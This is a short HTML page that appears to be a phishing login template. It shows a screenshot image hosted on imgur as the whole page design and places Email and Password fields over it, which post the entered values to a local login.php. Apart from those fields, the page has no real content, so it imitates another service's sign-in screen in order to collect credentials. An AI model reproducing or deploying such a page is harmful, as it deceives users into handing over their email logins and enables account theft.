<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Document</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:655px; z-index:0"><img src="https://i.imgur.com/QT4CLIV.jpg" alt="" title="" border=0 width=1350 height=655></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:274px;left:539px;top:349px;z-index:2;height: 44px;" required placeholder="Email">
<input name="formtext2" type="Password" style="position:absolute;width:274px;left:539px;top:394px;z-index:3;height: 44px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:533px; top:441px; z-index:4"><input type="image" name="formimage1" width="284" height="45" src="https://i.imgur.com/BuZehJo.jpg"></div>
<div id="formcheckbox1" style="position:absolute; left:534px; top:492px; z-index:5"><input type="checkbox" name="formcheckbox1"></div>
</form>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:657px; width:1346px; height:69px; z-index:6"><img src="https://i.imgur.com/XZUuAhK.jpg" alt="" title="" border=0 width=1346 height=69></div>


</body>
</html>
